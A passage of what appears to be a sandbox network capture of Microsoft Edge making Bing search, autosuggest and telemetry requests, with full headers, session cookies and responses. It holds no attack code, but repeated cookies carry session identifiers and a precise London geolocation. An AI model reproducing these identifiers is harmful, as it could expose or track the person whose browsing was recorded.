cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:54 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306934.7f1c6a5
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c8b4
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 633
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c8e0
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 25802
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1778
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a37e2d74b42a5e100923ec73eb6
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-nJByTVMVOcn9HpvQ4dVswgvdOnxUJ46rPj980ghoeYg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:55 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c912
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1733306925387%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aonjon%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306925391%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aonjon%22%2C%22AsResponseLength%22%3A%22409%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306925491%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aonjon%2Cig%3AEA9C665A0C9B4F1F9D95E0FFB57F2681%22%2C%22AnswerInfo%22%3A%22HS%3B5%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306925522%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306926338%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22sbox%22%3A%22typing%22%2C%22time%22%3A6780%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306926340%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1733306925387%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aonjon%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306925391%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aonjon%22%2C%22AsResponseLength%22%3A%22409%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306925491%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aonjon%2Cig%3AEA9C665A0C9B4F1F9D95E0FFB57F2681%22%2C%22AnswerInfo%22%3A%22HS%3B5%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306925522%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ar%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306926338%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22sbox%22%3A%22typing%22%2C%22time%22%3A6780%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306926340%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2713
date: Wed, 04 Dec 2024 10:08:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c98f
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=r&cp=1&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=r&cp=1&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2677
date: Wed, 04 Dec 2024 10:08:55 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306935.7f1c99c
GET

https://www.bing.com/th?id=OSK.11014e0765e9a4f0689f2c62e5ca1b80&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.11014e0765e9a4f0689f2c62e5ca1b80&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
